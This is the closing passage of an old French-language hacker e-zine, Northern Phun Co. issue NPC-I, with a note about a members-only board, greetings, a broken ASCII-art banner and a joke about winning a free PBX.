sous le coup d'un trojan, allez-vous rhabiller... L.O.S. est
dsormais rserv exclusivement aux membres en rgle de NPC.
L'accs est plutt difficile pour le commun des mortels...


Greets go to: Pixture God, Nancy Reagan, et Yakoul.


         ---==Fin de Northern Phun Co.- The magazine - NPC-I==---


      ͻ
     ڶ N   ǿ    Ŀ         Ŀ  Ŀ Ŀ    Ŀ
  Ĵ  P  Ŀ      Ŀ    Ŀ ſ     Ĵ1
        C                                
      ͼ                    
Tous ceux qui trouveront la solution du rbus reevront un PBX gratuit...